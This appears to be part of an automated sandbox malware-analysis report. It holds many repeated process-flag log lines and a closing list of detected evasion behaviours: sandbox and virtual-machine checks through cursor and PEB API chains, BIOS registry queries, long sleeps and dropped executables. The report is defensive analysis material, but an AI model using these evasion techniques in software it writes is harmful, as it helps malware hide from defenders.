Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Sandbox detection routine: GetCursorPos, DecisionNode, Sleep
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: 1630000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 3020000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 5020000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCursorPos,GetCursorPos,Sleep,GetCursorPos,__aulldiv,Sleep, 3_2_00432FE0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1186
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 651
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_RegDLL.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\uninstall\is-R79QI.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Play Glock\is-75FQC.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IZImiIFXXrvtVOHFozZW.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_setup64.tmp Jump to dropped file
